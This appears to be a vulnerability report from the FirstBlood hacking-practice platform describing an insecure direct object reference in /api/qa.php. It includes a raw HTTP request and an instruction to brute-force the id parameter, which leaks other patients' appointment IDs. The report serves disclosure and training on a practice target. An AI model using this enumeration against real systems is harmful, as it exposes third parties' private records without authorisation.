FirstBlood-#246Idor
This issue was discovered on FirstBlood v1



On 2021-05-14, thesecguy Level 2 reported:

bug

fetching aptid values

request

POST /api/qa.php HTTP/1.1
Host: firstbloodhackers.com:49709
Content-Length: 11
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://firstbloodhackers.com:49709
Referer: http://firstbloodhackers.com:49709/yourappointments.php
Accept-Encoding: gzip, deflate
Accept-Language: en-IN,en-GB;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: drps=569ffbc7c6c2c8569e20b65c3
Connection: close

id=569[11493]

In the above request bruteforce the last six values to leak the aptid of the appointment

impact

able to see third party appointments with uuid

P2 High

Endpoint: /api/qa.php

Parameter: id=

Payload: 56911493


FirstBlood ID: 5
Vulnerability Type: Insecure direct object reference

The endpoint QA.php (to query for an appointment) will allow for integer values to be used when querying for appointments. A bad cause of security through obscurity was attempted.